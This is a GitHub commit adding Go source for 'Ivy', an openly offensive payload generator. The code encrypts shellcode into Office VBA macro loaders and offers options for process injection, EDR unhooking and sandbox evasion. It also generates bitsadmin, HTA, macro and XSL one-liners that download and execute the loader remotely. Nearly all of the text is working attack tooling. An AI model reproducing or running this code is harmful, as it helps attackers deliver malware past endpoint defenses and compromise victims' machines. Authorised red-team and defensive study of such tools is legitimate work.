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Tylous committed Jan 10, 2022
1 parent 0beab9b commit 522c268
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Showing 13 changed files with 2,186 additions and 0 deletions.
193 changes: 193 additions & 0 deletions Cryptor/Cryptor.go
Original file line number Diff line number Diff line change
@@ -0,0 +1,193 @@
package Cryptor

import (

xor ""

type args struct {
Key string
Ciphertext string

const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
const numbers = "1234567890"
const capital = "ABCDEF"

func generateRandomBytes(n int) ([]byte, error) {
b := make([]byte, n)
_, err := rand.Read(b)
if err != nil {
return nil, err

return b, nil

func Rc4_encryptor(text string) (string, string) {
plaintext := []byte(text)
key, _ := generateRandomBytes(32)
block, _ := rc4.NewCipher(key)
ciphertext := make([]byte, len(plaintext))
block.XORKeyStream(ciphertext, plaintext)

b64ciphertext := base64.StdEncoding.EncodeToString(ciphertext)
b64key := base64.StdEncoding.EncodeToString(key)
return b64ciphertext, b64key


func RandStringBytes(n int) string {
b := make([]byte, n)
for i := range b {
b[i] = letters[rand.Intn(len(letters))]

return string(b)

func randclassid() string {
nn := 7
f := make([]byte, nn)
e := make([]byte, nn)
for i := range f {
f[i] = letters[rand.Intn(len(numbers))]
for i := range e {
e[i] = letters[rand.Intn(len(capital))]

b := string(f) + "-0000-0000-0000-0000" + string(e)
return string(b)

func VarNumberLength(min, max int) string {
var r string
num := rand.Intn(max-min) + min
n := num
r = RandStringBytes(n)
return r

func StagelessArrayGen(data []byte) string {
var fmtStr string
//var StrSlice []string
aSlice := data
fmtStr = strings.Repeat("%d, ", len(aSlice)-1)
fmtStr += "%d"
var slice []interface{} = make([]interface{}, len(aSlice))
for f := range aSlice {
slice[f] = int8(aSlice[f])
retStr := fmt.Sprintf(fmtStr, slice...)
return retStr

func ShellCodePayload(shellcode string, EncodedPayload string, opt bool, jscriptshellcode string) string {
var scpayload []string
if strings.Contains(string(shellcode), "=") {
shellcodetemp := strings.Split(string(shellcode), "=")
shellcode = string(shellcodetemp[1])
if strings.Contains(string(shellcode), "\"") {
shellcode = strings.Replace(shellcode, "\"", "", -1)
if strings.Contains(string(shellcode), ";") {
shellcode = strings.Replace(string(shellcode), ";", "", -1)
if strings.Contains(string(shellcode), "\\x") {
shellcode = strings.Replace(string(shellcode), "\\x", "", -1)
if strings.Contains(string(shellcode), " ") {
shellcode = strings.Replace(string(shellcode), " ", "", -1)
if strings.Contains(string(shellcode), "\n") {
shellcode = strings.Replace(string(shellcode), "\n", "", -1)
const MAX_LENGTH int = 850
x := 0
shellcodeLength := len(shellcode)
scpayload = append(scpayload, fmt.Sprintf("\r"))
for x < shellcodeLength {
if opt == true {

if x+MAX_LENGTH <= shellcodeLength {
scpayload = append(scpayload, fmt.Sprintf(EncodedPayload+" = "+EncodedPayload+" & \"%s\"\n", shellcode[0+x:x+MAX_LENGTH]))
} else {
finalLength := shellcodeLength - x
scpayload = append(scpayload, fmt.Sprintf(EncodedPayload+" = "+EncodedPayload+" & \"%s\"\n", shellcode[0+x:x+finalLength]))
x += finalLength
} else if opt == false {
if x+MAX_LENGTH <= shellcodeLength {
scpayload = append(scpayload, fmt.Sprintf(EncodedPayload+" = "+EncodedPayload+" & \"%s\"\n", shellcode[0+x:x+MAX_LENGTH]))
} else {
finalLength := shellcodeLength - x
scpayload = append(scpayload, fmt.Sprintf(EncodedPayload+" = "+EncodedPayload+" & \"%s\"\n", shellcode[0+x:x+finalLength]))
x += finalLength
shellpayload := strings.Join(scpayload, "")
return shellpayload

func VbaCodePayload(vbacode string, EncodedPayload string, opt bool, jscriptshellcode string) string {
var scpayload []string
if opt == true {
const MAX_LENGTH int = 850
x := 0
shellcodeLength := len(vbacode)
scpayload = append(scpayload, fmt.Sprintf("\r"))
for x < shellcodeLength {
if x+MAX_LENGTH <= shellcodeLength {
scpayload = append(scpayload, fmt.Sprintf(EncodedPayload+" = "+EncodedPayload+" & \"%s\"\n", vbacode[0+x:x+MAX_LENGTH]))
} else {
finalLength := shellcodeLength - x
scpayload = append(scpayload, fmt.Sprintf(EncodedPayload+" = "+EncodedPayload+" & \"%s\"\n", vbacode[0+x:x+finalLength]))
x += finalLength

vbacode = strings.Join(scpayload, "")
if strings.Contains(string(vbacode), "myArray = ") {
vbacode = strings.Replace(string(vbacode), "myArray = ", "", -1)
return vbacode

func Encrypt(data string, key string, shellcode string, EncodedPayload string) string {
var rawpayload []string
input := []byte(xor.EncryptDecrypt(data, key))
rawr := hex.EncodeToString(input)
const MAX_LENGTH int = 950
x := 0
rawrLength := len(rawr)
rawpayload = append(rawpayload, fmt.Sprintf("\r"))
rawpayload = append(rawpayload, fmt.Sprintf(" "+shellcode+" += 'Sub init()\\n';\n"))
for x < rawrLength {
if x+MAX_LENGTH <= rawrLength {
rawpayload = append(rawpayload, fmt.Sprintf(" "+shellcode+" += '"+EncodedPayload+" = "+EncodedPayload+" & \"%s\"\\n';\n", rawr[0+x:x+MAX_LENGTH]))
} else {
finalLength := rawrLength - x
rawpayload = append(rawpayload, fmt.Sprintf(" "+shellcode+" += '"+EncodedPayload+" = "+EncodedPayload+" & \"%s\"\\n';\n", rawr[0+x:x+finalLength]))
x += finalLength
rawpayload = append(rawpayload, fmt.Sprintf(" "+shellcode+" += 'End Sub\\n';\n"))
payload := strings.Join(rawpayload, "")
return payload
159 changes: 159 additions & 0 deletions Ivy.go
Original file line number Diff line number Diff line change
@@ -0,0 +1,159 @@
package main

import (


var (
debugging bool
debugWriter io.Writer

// FlagOptions ...
type FlagOptions struct {
payloadtype string
outFile string
product string
stageless bool
unhook bool
inputFile32 string
inputFile64 string
CommandLoader string
URL string
sandbox bool
process32 string
process64 string

func options() *FlagOptions {
payloadtype := flag.String("P", "", "Payload type \"Inject\" (Which performs a process injection) or \"Local\" (Which loads the payload directly into the current process)")
outFile := flag.String("O", "", "Name of output file")
product := flag.String("product", "Excel", "Name of the office product to use (Excel, Word, PowerPoint)")
debug := flag.Bool("debug", false, "Print debug statements")
sandbox := flag.Bool("sandbox", false, "Enable sandbox evasion controls (i.e. checks if the system is domain joined)")
unhook := flag.Bool("unhook", false, "Unhooks EDR's hooks before loading payload")
URL := flag.String("url", "", "URL assoicated with the Delivery option to retrieve the payload. (e.g")
CommandLoader := flag.String("delivery", "", `Generates an one-liner command to download and execute the payload remotely:
[*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader.
[*] hta - Generates a blank hta file containing the loader along with a one liner command execute the loader remotely.
[*] macro - Generates an office macro that would download and execute a the loader remotely.
[*] xsl - Generates a xsl stylesheet file containing the loader along with a one liner command execute the loader remotely.`)
stageless := flag.Bool("stageless", false, "Enables stageless payload. When this option is enabled use a raw payload (aka .bin files) instead of .c code")
inputFile32 := flag.String("Ix86", "", "Path to the x86 payload")
inputFile64 := flag.String("Ix64", "", "Path to the x64 payload")
process32 := flag.String("process32", "", "The full path to the x86 application to spawn. Only use applications that are found in System32 & SYSWOW64 (use \\ for the path) (default is rundll32.exe)")
process64 := flag.String("process64", "", "The full path to the x64 application to spawn. Please specify the path to the process to create/inject into (use \\ for the path) (default is explorer.exe)")
debugging = *debug
debugWriter = os.Stdout
return &FlagOptions{payloadtype: *payloadtype, outFile: *outFile, product: *product, inputFile64: *inputFile64, inputFile32: *inputFile32, CommandLoader: *CommandLoader, URL: *URL, stageless: *stageless, unhook: *unhook, sandbox: *sandbox, process32: *process32, process64: *process64}

func main() {
___ ___ ___ ___ ___
|\ \ |\ \ / /||\ \ / /|
\ \ \\ \ \ / / /\ \ \/ / /
\ \ \\ \ \/ / / \ \ / /
\ \ \\ \ / / \/ / /
\ \__\\ \__/ / __/ / /
\|__| \|__|/ |\___/ /
The suffering. The pain. Can't you hear them?
Their cries for mercy?
opt := options()

var rawpayload32 []string
var rawpayload64 []string
var strawpayload32 string
var strawpayload64 string

if opt.payloadtype == "Inject" || opt.payloadtype == "Local" {

} else {
log.Fatal("Error: Invalid payload type")

if opt.inputFile32 == "" && opt.inputFile64 == "" {
log.Fatal("Error: Please provide a path to a file containing a raw shellcode or payload")

if opt.outFile == "" {
log.Fatal("Error: Please provide a name for the payload the you wish to generate")
if opt.inputFile32 != "" && opt.stageless == false {
Utils.PrintDebug(debugging, "Reading payload file %s\n", opt.inputFile32)
rawinputfile32 := Utils.Readfile(opt.inputFile32)

Utils.PrintDebug(debugging, "Appending payload %v\n", rawinputfile32)
for _, rawpayloadlines32 := range rawinputfile32 {
rawpayloadlines32 = string(rawpayloadlines32 + "\n")
rawpayload32 = append(rawpayload32, rawpayloadlines32)

if opt.inputFile64 != "" && opt.stageless == false {
Utils.PrintDebug(debugging, "Reading payload file %s\n", opt.inputFile64)
rawinputfile64 := Utils.Readfile(opt.inputFile64)

Utils.PrintDebug(debugging, "Appending payload %v\n", rawinputfile64)
for _, rawpayloadlines64 := range rawinputfile64 {
rawpayloadlines64 = string(rawpayloadlines64 + "\n")
rawpayload64 = append(rawpayload64, rawpayloadlines64)

if opt.inputFile64 != "" && opt.stageless == true {
Utils.PrintDebug(debugging, "Reading payload file %s\n", opt.inputFile64)
src, _ := ioutil.ReadFile(opt.inputFile64)
if opt.payloadtype == "Inject" {
var rawbyte []byte
rawbyte = src
strawpayload64 = Cryptor.StagelessArrayGen(rawbyte)
} else if opt.payloadtype == "Local" {
strawpayload64 = hex.EncodeToString(src)

if opt.inputFile32 != "" && opt.stageless == true {
Utils.PrintDebug(debugging, "Reading payload file %s\n", opt.inputFile32)
src, _ := ioutil.ReadFile(opt.inputFile32)
if opt.payloadtype == "Inject" {
var rawbyte []byte
rawbyte = src
strawpayload32 = Cryptor.StagelessArrayGen(rawbyte)
} else if opt.payloadtype == "Local" {
strawpayload32 = hex.EncodeToString(src)

var rrawpayload64 string
var rrawpayload32 string
if opt.stageless == true {
rrawpayload64 = strawpayload64
rrawpayload32 = strawpayload32
} else {
rrawpayload64 = strings.Join(rawpayload64, "")
rrawpayload32 = strings.Join(rawpayload32, "")

Loader.Varibles(opt.stageless, opt.payloadtype, opt.outFile, opt.URL, opt.CommandLoader, opt.sandbox, debugging, opt.unhook, rrawpayload64, rrawpayload32, opt.process32, opt.process64, opt.product)
fmt.Println("[+] Loader File Generated: " + opt.outFile + "")
fmt.Println("[*] Remember the systems targeted need to have Office installed in order to work")
Utils.Commands(opt.URL, opt.CommandLoader, opt.outFile)


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